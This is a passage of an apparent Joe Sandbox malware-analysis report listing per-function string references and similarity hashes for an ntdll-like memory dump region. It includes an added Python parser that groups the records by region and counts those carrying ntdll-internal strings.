                                                                                                                • Instruction Fuzzy Hash: 3A918071558346AFEB22DF65CC60EBBBAECBF94644F40092FF68496161E370D904CB62
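The records above are Joe Sandbox's per-function summaries for the PE-backed dump at offset 01470000. The strings they reference (minkernel\ntdll\ldrinit.c, LdrpInitializeProcess, LdrpInitShimEngine, RtlReAllocateHeap, the AVRF and SXS debug messages) are ntdll.dll's own, so an analyst weighing the report's "direct / indirect syscall" signature will want to know whether that region is the loaded ntdll module or a second copy of it. The first step is to group the records per dump region and count how many functions carry ntdll-internal strings. The Python below does that; it is an added example, not the report's or Joe Sandbox's code. The two sample records are constructed in the page's layout with shortened placeholder hashes, the second one being a made-up control from a region at 00400000; the marker list and the hit threshold are assumptions, and comparing the region offset against the report's loaded-module list is left to the analyst.

```python
"""Parser for Joe Sandbox per-function records, plus a check for dump regions
whose referenced strings are ntdll's own. Added example; not part of the report."""
import re
from collections import defaultdict

# Constructed sample in the report's layout (hashes are placeholders; the
# second record is a made-up control from another region).
SAMPLE = r"""
Strings
• LdrpInitializeProcess, xrefs: 014D8422
• minkernel\ntdll\ldrinit.c, xrefs: 014D8421
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Similarity
• API ID:
• String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
• API String ID: 0-1918872054
• Opcode ID: 2cb1fd4f
• Opcode Fuzzy Hash: 2cb1fd4f
• Instruction Fuzzy Hash: 3A918071
APIs
  • Part of subcall function 00401000: Sleep.KERNEL32 ref: 00401010
Memory Dump Source
• Source File: 00000000.00000002.0000000000.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Sleep
• String ID:
• API String ID: 0-0
• Opcode ID: aaaa0001
• Opcode Fuzzy Hash: aaaa0001
• Instruction Fuzzy Hash: cccc0001
"""
HEADERS = {"Strings", "APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(.+?)\s+ref:\s*([0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^[^,]+,\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(\w+)$")
# Strings only ntdll's own code references, taken from what the report lists
# for this region; an assumed, non-exhaustive marker set.
NTDLL_MARKERS = ("minkernel\\ntdll\\", "LdrpInitialize", "LdrpInitShimEngine",
                 "RtlReAllocateHeap", "LdrResFallbackLangList", "AVRF: ", "SXS: ")

def _finish(rec):
    f = rec["fields"]
    rec["strings"] = [s for s in f.get("String ID", "").split("$") if s]   # '$'-separated
    rec["api_ids"] = [a for a in f.get("API ID", "").split("$") if a]
    m = SOURCE_RE.match(f.get("Source File", ""))
    rec["region"] = int(m.group(1), 16) if m else None
    rec["pe_backed"] = bool(m) and m.group(2).lower() == "true"
    # Every record on the page has Opcode ID equal to its Opcode Fuzzy Hash.
    rec["opcode_id_matches_fuzzy"] = f.get("Opcode ID") == f.get("Opcode Fuzzy Hash")
    return rec

def parse_records(text):
    """One dict per record, from its first Strings/APIs header to its Instruction Fuzzy Hash."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            cur = cur or {"xrefs": {}, "apis": [], "fields": {}}
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "Strings":            # "<string>, xrefs: <addr>, <addr>"
            s, sep, refs = body.rpartition(", xrefs: ")
            cur["xrefs"][s if sep else body] = [r for r in refs.split(", ") if sep and r]
        elif section == "APIs":             # "[Part of subcall function X: ]<api> ref: <addr>"
            m = API_RE.match(body)
            if m:
                cur["apis"].append((m.group(1), m.group(2)))
        else:                               # "<key>: <value>"
            key, _, value = body.partition(":")
            cur["fields"][key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                records.append(_finish(cur))
                cur = None
    return records

def references_ntdll(rec):
    return any(m in s for s in rec["strings"] for m in NTDLL_MARKERS)

def summarize_regions(records, min_hits=1):
    """Per dump region: functions seen, and how many carry ntdll-internal strings (min_hits is assumed)."""
    out = defaultdict(lambda: {"functions": 0, "ntdll_hits": 0, "pe_backed": False})
    for rec in records:
        e = out[rec["region"]]
        e["functions"] += 1
        e["pe_backed"] = e["pe_backed"] or rec["pe_backed"]
        e["ntdll_hits"] += references_ntdll(rec)
    for e in out.values():
        e["holds_ntdll_code"] = e["pe_backed"] and e["ntdll_hits"] >= min_hits
    return dict(out)

if __name__ == "__main__":
    for region, info in summarize_regions(parse_records(SAMPLE)).items():
        print("region", region and f"{region:08X}", info)
```

Run against the report's own records (pasted in place of SAMPLE), the region keyed 01470000 collects every record above, all of which hit the marker set, while a region holding the sample's own code would not; whether 01470000 is where the real ntdll.dll was loaded has to be read off the report's module list, which this block does not see.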
Strings
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015122B6
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015121D9, 015122B1
• .Local, xrefs: 014D28D8
• SXS: %s() passed the empty activation context, xrefs: 015121DE
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
Strings
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 0151342A
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01513437
• RtlDeactivateActivationContext, xrefs: 01513425, 01513432, 01513451
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01513456
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
Strings
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0150106B
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015010AE
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01500FE5
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01501028
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 0150A9A2
• apphelp.dll, xrefs: 014C2462
• LdrpDynamicShimModule, xrefs: 0150A998
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0150A992
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
Strings
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
Strings
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: $@
• API String ID: 0-1077428164
Strings
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
Strings
• Failed to allocated memory for shimmed module list, xrefs: 0150A10F
• minkernel\ntdll\ldrinit.c, xrefs: 0150A121
• LdrpCheckModule, xrefs: 0150A117
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
Strings
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
• API String ID: 0-1334570610
Strings
• LdrpInitializePerUserWindowsDirectory, xrefs: 015182DE
• Failed to reallocate the system dirs string !, xrefs: 015182D7
• minkernel\ntdll\ldrinit.c, xrefs: 015182E8
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
Strings
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0155C1C5
• PreferredUILanguages, xrefs: 0155C212
• @, xrefs: 0155C1F1
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
Strings
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
Strings
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01524888
• minkernel\ntdll\ldrredirect.c, xrefs: 01524899
• LdrpCheckRedirection, xrefs: 0152488F
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-2558761708
Strings
• Process initialization failed with status 0x%08lx, xrefs: 015220F3
• minkernel\ntdll\ldrinit.c, xrefs: 01522104
• LdrpInitializationFailure, xrefs: 015220FA
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
Strings
• LdrResSearchResource Exit, xrefs: 014AAA25
• LdrResSearchResource Enter, xrefs: 014AAA13
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
Strings
• kLsE, xrefs: 014A0540
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014A063D
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
Strings
• RtlpResUltimateFallbackInfo Enter, xrefs: 014AA2FB
• RtlpResUltimateFallbackInfo Exit, xrefs: 014AA309
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: MUI
• API String ID: 0-1339004836
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
                                                                                                                • Opcode ID: 4562cb5e88536d4afb62454038f53fb3557df94230b10b016ba8748fe4fc7124
                                                                                                                • Instruction ID: 9504f8ea14079cf277b1800550fd33fb9e5d5539355077cef9bf8c7660b1c420
                                                                                                                • Opcode Fuzzy Hash: 4562cb5e88536d4afb62454038f53fb3557df94230b10b016ba8748fe4fc7124
                                                                                                                • Instruction Fuzzy Hash: 8D918032900605BBDB229FA6DC85FEFBBB9FF55754F14002AF505AB260D778A901CB50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: GlobalTags
                                                                                                                • API String ID: 0-1106856819
                                                                                                                • Opcode ID: 31741a644143d5ab54594885901e01ed437a4abb39cd2a69f83cd360b51267a9
                                                                                                                • Instruction ID: 8427edf1898d2354b4a896fa67db373dd0fcc3ab1aaede5ba674b83e480899aa
                                                                                                                • Opcode Fuzzy Hash: 31741a644143d5ab54594885901e01ed437a4abb39cd2a69f83cd360b51267a9
                                                                                                                • Instruction Fuzzy Hash: 55719275E0020ADFEF2ACF9DD490AADBBF1BF58710F14852EE905AB254E7709841CB50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .mui
                                                                                                                • API String ID: 0-1199573805
                                                                                                                • Opcode ID: f192e8700cf1e745c2b3061d6a7a72c4cd27845a8fbcb0815baa8a1b5c39b4eb
                                                                                                                • Instruction ID: ab664b5e46c83110f6eb9b040e07a0b06ea38c3bb4745fb5a4f92ecba041ff33
                                                                                                                • Opcode Fuzzy Hash: f192e8700cf1e745c2b3061d6a7a72c4cd27845a8fbcb0815baa8a1b5c39b4eb
                                                                                                                • Instruction Fuzzy Hash: 5C519272D4022A9BDF10DF9AD840BAEBBB5BF14A58F05412EEA11BF250D7749C01CBE4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: EXT-
                                                                                                                • API String ID: 0-1948896318
                                                                                                                • Opcode ID: 162adb6423bc9e083e352c21f08eec73ee127d02a77faea1fa51dc3e3e17251d
                                                                                                                • Instruction ID: 2274e75dc1cae08b85f24c095b850712ee7879eee7d9d0775906fd714db075e8
                                                                                                                • Opcode Fuzzy Hash: 162adb6423bc9e083e352c21f08eec73ee127d02a77faea1fa51dc3e3e17251d
                                                                                                                • Instruction Fuzzy Hash: A34192725083429BD711DA7AC880BEBB7E8AFD8614F44092FF684E7260E674D90587A2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryHash
                                                                                                                • API String ID: 0-2202222882
                                                                                                                • Opcode ID: e7ab3d01322e0afd162735219ec60dda4565012ebdb78a4c84356b8fd1183ec3
                                                                                                                • Instruction ID: 40bbbf884657bbf761756cff339c687c5723059c8d89950dd0f66fba09b1c022
                                                                                                                • Opcode Fuzzy Hash: e7ab3d01322e0afd162735219ec60dda4565012ebdb78a4c84356b8fd1183ec3
                                                                                                                • Instruction Fuzzy Hash: C74144F1D4012DAAEF21DA50CC84FDEB77CBB54714F0045AAEA08AB154DB719E498FA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #
                                                                                                                • API String ID: 0-1885708031
                                                                                                                • Opcode ID: 13bff653ee37cd46fa9fac4942015afa5fa9c6341d3fa1eab61ec321bf964b4d
                                                                                                                • Instruction ID: ff5f152e55dccb5369e9c98f2b5ac3a272519eb13fbaec186ce9511fb49b698e
                                                                                                                • Opcode Fuzzy Hash: 13bff653ee37cd46fa9fac4942015afa5fa9c6341d3fa1eab61ec321bf964b4d
                                                                                                                • Instruction Fuzzy Hash: 29311831A0070DABEB22CB6AC854BEE7BB8EF94704F14402DE940AF292D775DA05CB50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryName
                                                                                                                • API String ID: 0-215506332
                                                                                                                • Opcode ID: b16062512b248dd6d785aa8652a0ac85ad3b493ed4740d70a63b5827372c6075
                                                                                                                • Instruction ID: 8b60d5088ba360c7d23aea27030cce357e1ae4f796ba1019fa1aa91337e926d7
                                                                                                                • Opcode Fuzzy Hash: b16062512b248dd6d785aa8652a0ac85ad3b493ed4740d70a63b5827372c6075
                                                                                                                • Instruction Fuzzy Hash: 95310336A40519AFFB17DB59C845E6FBBB4FB80720F01416AA901EB250D771AE00DBE0
                                                                                                                Strings
                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0152895E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                • API String ID: 0-702105204
                                                                                                                • Opcode ID: 3fe7d1efd75515bef6727ae53f8bd7e8c6f72c92c5e5f937979b2c5858e47e7a
                                                                                                                • Instruction ID: 2508dc65883dd6b7fe3a19415a45d0119e91bd97ec25efa732ef422eee29e64d
                                                                                                                • Opcode Fuzzy Hash: 3fe7d1efd75515bef6727ae53f8bd7e8c6f72c92c5e5f937979b2c5858e47e7a
                                                                                                                • Instruction Fuzzy Hash: 0901F7333102329BEF266F9A9884B6E7BE5FF93654F05045EF6411E5A1CB207854C793
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b71daa3c5ada4ff0a8dec278a3a0e71fb7b1415b430ff73687374c48c401357f
                                                                                                                • Instruction ID: 71a2ec5e043e23b49e2724376a0fbb0a8913fdb809f890a93b32ad35ffad1e3e
                                                                                                                • Opcode Fuzzy Hash: b71daa3c5ada4ff0a8dec278a3a0e71fb7b1415b430ff73687374c48c401357f
                                                                                                                • Instruction Fuzzy Hash: 3342E5366083518FE725CF69D890A6FBBE5FF98308F08492DFA869B250D770D845CB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 46a33fe37910f1223037e5431d5afc9d9abed0b26e84c7b761afd0f84f4e2b7f
                                                                                                                • Instruction ID: bf4d63ef4b6b072fd61f600b48272193092b25bf10191687c88067ff1f0581f4
                                                                                                                • Opcode Fuzzy Hash: 46a33fe37910f1223037e5431d5afc9d9abed0b26e84c7b761afd0f84f4e2b7f
                                                                                                                • Instruction Fuzzy Hash: 64426075E002198FEB25CF69C881BADBBF5BF94300F14819EE949EB251D7349985CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b7b6a4c0dbb548f54ccc007a51abc07ff437c2fc23aa47e3f98a88c2d10493e8
                                                                                                                • Instruction ID: cbbad1b5baf66c932c939f29a3a2b13fae8d4e178a748fdbfb674b0b69262589
                                                                                                                • Opcode Fuzzy Hash: b7b6a4c0dbb548f54ccc007a51abc07ff437c2fc23aa47e3f98a88c2d10493e8
                                                                                                                • Instruction Fuzzy Hash: 6E320370A007568FDB26CFA9C854BBEBBF2BF84304F24451ED54A9F284D775A922CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d309106eddc179eccd32fcb45d56250cf4146a0fbee93065afeada3c0a3352e
                                                                                                                • Instruction ID: 876860fe3ce0db2c54ecc8b5b6cdd20154af2efd3d285906d6c14c232d769e06
                                                                                                                • Opcode Fuzzy Hash: 6d309106eddc179eccd32fcb45d56250cf4146a0fbee93065afeada3c0a3352e
                                                                                                                • Instruction Fuzzy Hash: 5332D170A00615CFDB25CFA8C480BAEB7F1FF58300F5A456AE956AB3A1D730E841CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                • Instruction ID: a34b9ef98f05a76593d6720e645aaa362e72136fcd3b53036fbadfe4e9585cd3
                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                • Instruction Fuzzy Hash: 87F18479E0020A9BDF55DF99C590BAEBBF5BF44B10F09812EE901AB360E734D842CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
